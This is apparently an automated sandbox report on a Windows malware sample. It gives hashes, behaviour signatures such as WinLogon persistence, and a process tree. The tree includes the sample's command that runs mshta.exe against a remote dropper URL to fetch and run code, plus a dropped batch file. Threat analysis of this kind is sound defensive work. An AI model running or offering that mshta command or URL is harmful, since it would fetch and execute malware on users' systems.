Analysis

  • max time kernel
    8s
  • max time network
    9s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 05:58

Errors

Reason
Machine shutdown

General

  • Target

    eab699eac197429f125af077a30e363a_JaffaCakes118.exe

  • Size

    621KB

  • MD5

    eab699eac197429f125af077a30e363a

  • SHA1

    e0955cdf4e563eaf28a9038173ad88e6a9835ef7

  • SHA256

    0a382c1a74a1491bd21e734e36bc9250f91f7e87ca7646bec5ca03a17fedc97f

  • SHA512

    193f5674ad3aa4118e1405bca83268c1bfaffd4e208c79e05fec419545a1e859bbadda457856948cd17792aff0096d5638fd4c0dec737b4aafcd35e776acfba2

  • SSDEEP

    12288:klNHUskcoihNNcTIXco2yRmkWbNdCWQwBDVZq3MCjptcVdsNfGJ:EUryFcTIXco1RmxPC5qVZogsNfG

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://rtopotr.com/inst.php?id=lee_30

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eab699eac197429f125af077a30e363a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\eab699eac197429f125af077a30e363a_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://rtopotr.com/inst.php?id=lee_30
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      PID:1376
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2544
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:2604
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:2872

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\agtyjkj.bat

        Filesize

        262B

        MD5

        c478f7ad57ef3406c61a873ecdf126f4

        SHA1

        0ea121263f0b73dfacbe0767e8bf771daa0eb497

        SHA256

        01e3fe7d5d563c577a4940b740c1274d0e6fdcf1882c070214ab295dd4795523

        SHA512

        2e98737304a6af5646165a933ba1a323ce830b9749ef595f2c7be84f4b6236032e46ef71c84ae405741d2c31e46e398c00efa2ecd5bb55de99772d6a25cc32e9

      • memory/2384-0-0x0000000000400000-0x000000000073D000-memory.dmp

        Filesize

        3.2MB

      • memory/2384-1-0x00000000001C0000-0x00000000001C1000-memory.dmp

        Filesize

        4KB

      • memory/2384-2-0x0000000003AD0000-0x0000000003AE0000-memory.dmp

        Filesize

        64KB

      • memory/2384-14-0x0000000000400000-0x000000000073D000-memory.dmp

        Filesize

        3.2MB